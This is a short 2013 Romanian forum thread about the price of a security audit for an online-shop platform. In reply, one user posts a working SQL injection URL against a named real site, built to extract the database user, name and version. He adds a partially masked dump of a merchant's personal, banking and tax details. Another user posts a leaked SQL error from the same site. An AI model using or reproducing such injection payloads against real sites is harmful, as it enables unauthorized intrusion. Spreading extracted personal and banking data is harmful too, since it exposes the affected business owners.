skedo Posted February 28, 2013 Report Posted February 28, 2013 care este pretul aproximativ pentru un audit de securitate partial doar pentru identificare nu si rezolvare la un magazin online gen Magazine Online ? Quote
abraxyss Posted February 28, 2013 Report Posted February 28, 2013 (edited) Sa-nteleg ca ai folosit majoritatea toolurilor automate si sisteme (probabil moca) si cineva tot ti l-a spart...?Depinde de cine este efectuat...Daca doresti servicii de genul, pm me cu site-ul si fac un black box testing moca of course, raportul nu-i mocaapropo, uite-aici un mic POChttp://www.magazine-online.ro/happypets/compara_produse.php?id_cat=-739854%20UNION%20SELECT%201%2C2%2CCONCAT_WS%28CHAR%2832%2C58%2C32%29%2Cuser%28%29%2Cdatabase%28%29%2Cversion%28%29%29%2C4%2C5%2C6--si o mica facturaa:15:{s:10:"id_magazin";s:4:"1630";s:4:"nume";s:7:"Bxxxxxu";s:7:"prenume";s:5:"Ixxxa";s:8:"username";s:5:"Cxxxl";s:5:"email";s:15:"office@cxxxl.ro";s:9:"categorie";s:2:"17";s:3:"url";s:12:"www.cxxxl.ro";s:5:"banca";s:30:"Raiffeisen Bank Suc. Bucuresti";s:4:"cont";s:24:"ROx447";s:7:"judetul";s:9:"Bucuresti";s:6:"sediul";s:24:"x";s:10:"cod_fiscal";s:8:"2x7";s:13:"nr_reg_comert";s:14:"J40x12/2007";s:10:"nume_firma";s:25:"SC x SRL";s:11:"tip_factura";i:1;} Edited February 28, 2013 by abraxyss Quote
PielesiOs Posted March 1, 2013 Report Posted March 1, 2013 Ultimele produse adaugate inselect SQL_CALC_FOUND_ROWS p.id_produs, p.nume_produs, p.pret, p.descriere_produs, cm.username as magazin, cm.descriere descriereMag, c.link_cat, cm.id_magazin from t_produse p left join d_magazine cm on cm.id_magazin = p.id_magazin left join t_categorii c on c.id_cat = p.id_cat where cm.demo != 1 AND id_produs > 6831112 order by p.id_produs desc limit -10,10 -> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 4Ce-avem noi aicea? E plin de domnesoare:)) Quote
